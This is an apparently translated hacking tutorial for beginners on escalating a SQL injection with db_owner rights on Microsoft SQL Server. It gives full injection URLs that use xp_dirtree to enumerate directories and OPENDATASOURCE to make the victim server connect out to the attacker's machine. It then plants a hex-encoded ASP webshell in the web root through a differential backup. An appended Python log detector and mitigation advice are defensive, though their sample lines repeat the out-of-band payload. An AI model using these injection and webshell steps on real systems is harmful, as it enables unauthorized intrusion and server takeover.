Ideas for when you hit db_owner during injection (with figures) _ Vulnerability Research

Source: Internet
Author: User
Tags: create database
First of all, this article is written for rookie friends to read.

Injection is everywhere now. There are lots of tools, and the era of hand injection is over; it has been replaced by injection tools such as NBSI, HDSI and D, which are also the rookies' favourites. Even someone who knows nothing at all can click the mouse a few times and the password of a site with an injection vulnerability comes out. The next step is scanning for the admin backend, and it's all over. If you have SA permission you can open 3389 or upload a webshell. If you have db_owner permission, consider using a differential backup. But what if the Web and the database are not on the same server? Actually it is not necessarily hopeless. Apart from writing a DOS command into the registry startup key so that it runs when the target server reboots, which has its limitations: the database user must have been granted rights on the master database, and administrators very rarely do that, so the hope is slim. Look at Figure 1.


With db_owner permissions, list the directories to see whether the database is on the same machine as the Web. If they are together, consider the differential backup. But what a pity: the web directory was not found. As shown in Figure 2.


This uses MSSQL's xp_dirtree stored procedure to read the path and then writes the results into a temporary table. The earlier NBSI didn't have this function, so the rookies had to scan for SA to get at the backend. Later NBSI added the treelist function, which lists directories so it is easier to view the directory structure. Then Smelly Beggar developed GetWebshell, which made this function really shine: insert the Trojan into the database, then back the database up as an ASP file. It is feasible. But if the database is too large, would a webshell of dozens of MB still work? Xiaolu backup is pretty good: it reduces the file size by making a differential backup. But back to the original point: the data and the Web are not together...

Actually, even when the database and the Web are not together there is still a chance. Think about it: a server generally has a system installed; does it also have IIS installed? Take a look at its C drive and see whether the inetpub directory exists; then you know whether IIS is installed. But you still don't know its IP. What do we do? You can ping the Web server and scan its class C for port 1433 to see which hosts have it open. But now many hosts have firewalls enabled, and even if 1433 is open you can't scan it. Instead you can use the OPENDATASOURCE function to make the other side's SQL Server connect to your own database. Once the connection is established, you get the IP address of the database server. Let's try it. First, you need a public IP, and port 1433 must be open and reachable from the Internet. Good. Let's start.

I'm working on this site now. The data and the Web are definitely not together, but I can see the Inetpub folder on the C drive, which means the database server has IIS installed. I just can't get its IP. It's easy with the method described above. First, build a database on my own machine. Open Query Analyzer and enter:
Create DATABASE hack520
Create TABLE zhu (name nvarchar(256) null);
CREATE TABLE J8 (id int null, name nvarchar(256) NULL);
Click Execute. As shown in Figure 4.



This sets up a database named hack520 and two tables, zhu and J8. zhu has one field, name; J8 has two fields, id and name. OK, now you are ready to start the connection. First look at this SQL statement: insert INTO OpenDataSource('SQLOLEDB', 'server=your ip;uid=sql user;pwd=sql password;database=the database you created').<table name> <statement to execute>. Well, let's start now...

http://www.xxx.com/news.asp?id=126'%20insert%20into%20opendatasource('SQLOLEDB','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

Execute it in IE. Now the other side connects to the SQL Server on my machine. Don't believe it? Run netstat -an and look. Figure 5.


Haha, already connected. Now I know the database server's IP, and the database server also has port 80 open. What now? Back up a webshell onto it. The web directory is known: C:\Inetpub\wwwroot. Okay, let's go.
http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737339323238 backup database @a to disk=@s-- back up the current database

http://www.xxx.com/news.asp?id=126;DROP table [hack520];create table [dbo].[hack520] ([cmd] [image])-- build a table

http://www.xxx.com/news.asp?id=126insert into hack520 (cmd) VALUES (0x3c2565786563757465207265717565737428226c2229253e)-- insert the blue screen Trojan

http://www.xxx.com/news.asp?id=126;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433a5c496e65747075625c777777726f6f745c7a68752e617370 backup database @a to disk=@s with differential,format-- make a differential backup again; the webshell is then at http://221.216xxx.xx/zhu.asp

The next step is to connect with the blue screen Trojan client. That is simple, so I won't say much about it here. I didn't get the Web server's shell, but at least I'm not empty-handed: I got the shell of the database server.
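As an added defensive example that is not part of the original article: a small Python detector that runs over constructed IIS-style log lines and flags the request patterns the walkthrough above depends on (an OPENDATASOURCE or OPENROWSET call that makes the SQL Server dial out, BACKUP ... TO DISK written through a web request, the xp_dirtree enumeration procedure, and a stacked second statement after a semicolon). It also decodes 0x... hex literals so an analyst can see the path being written without reading hex by hand. The log layout, IP address, password and hex literal in the sample are constructed placeholders, not values from the article.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in a simplified IIS W3C layout
# (date time method uri-stem uri-query status). They are illustrative only,
# not taken from the article; the IP, password and hex literal are placeholders.
SAMPLE_LOG = """\
2005-06-01 10:00:01 GET /news.asp id=126 200
2005-06-01 10:00:02 GET /news.asp id=126'%20insert%20into%20opendatasource('SQLOLEDB','server=203.0.113.5;uid=sa;pwd=placeholder;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases-- 500
2005-06-01 10:00:03 GET /news.asp id=126;declare%20@a%20sysname,@s%20varchar(4000)%20select%20@a=db_name(),@s=0x433a5c77%20backup%20database%20@a%20to%20disk=@s%20with%20differential,format-- 200
2005-06-01 10:00:04 GET /news.asp id=126;exec%20master..xp_dirtree%20'c:\\inetpub'-- 200
2005-06-01 10:00:05 GET /news.asp id=127 200
"""

# Each rule names one technique from the article. Patterns run against the
# URL-decoded, lower-cased, whitespace-collapsed query string.
RULES = {
    # OPENDATASOURCE / OPENROWSET make the victim SQL Server connect out to a
    # server chosen by the attacker (the out-of-band trick in the article).
    "out_of_band_distributed_query": re.compile(r"\bopen(?:datasource|rowset)\s*\("),
    # BACKUP ... TO DISK inside a web request is how a database gets written
    # into the web root as an .asp file.
    "backup_to_disk": re.compile(r"\bbackup\s+(?:database|log)\b.*\bto\s+disk\b"),
    # xp_dirtree is the stored procedure used to enumerate the file system.
    "dir_enumeration_proc": re.compile(r"\bxp_dirtree\b"),
    # A second statement after ';' in a GET parameter is never legitimate here.
    "stacked_statement": re.compile(r";\s*(?:declare|exec|insert|drop|create|use|backup)\b"),
}

HEX_LITERAL = re.compile(r"0x([0-9a-f]{8,})")


def normalize_query(raw_query):
    """URL-decode twice (to undo double encoding), lower-case, collapse whitespace."""
    text = unquote_plus(unquote_plus(raw_query))
    return " ".join(text.lower().split())


def decode_hex_literals(query):
    """Return the ASCII rendering of 0x... literals, which attackers use to hide
    paths and file contents from naive keyword filters."""
    decoded = []
    for match in HEX_LITERAL.finditer(query):
        digits = match.group(1)
        if len(digits) % 2:
            continue  # odd length cannot be a byte string
        decoded.append(bytes.fromhex(digits).decode("ascii", errors="replace"))
    return decoded


def classify(raw_query):
    """Return the names of all rules that fire on one raw query string."""
    query = normalize_query(raw_query)
    return [name for name, pattern in RULES.items() if pattern.search(query)]


def scan_log(log_text):
    """Parse each log line and return one finding per suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        parts = line.split(" ", 5)
        if len(parts) < 6:
            continue  # malformed line, skip it
        raw_query = parts[4]
        rules = classify(raw_query)
        if not rules:
            continue
        query = normalize_query(raw_query)
        findings.append({
            "line": lineno,
            "uri": parts[3],
            "rules": rules,
            "decoded_hex": decode_hex_literals(query),
            "query": query,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['uri']} -> {', '.join(finding['rules'])}")
        for literal in finding["decoded_hex"]:
            print(f"  hex literal decodes to: {literal!r}")
```

On the sample, lines 2, 3 and 4 are flagged and the hex literal on line 3 decodes to the start of a Windows path. The same patterns are worth alerting on in a WAF or SIEM, and the underlying exposure is closed by not running the web application as db_owner or SA, by disabling ad hoc distributed queries on the SQL Server, and by blocking outbound port 1433 from the database server so it cannot connect to arbitrary hosts.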
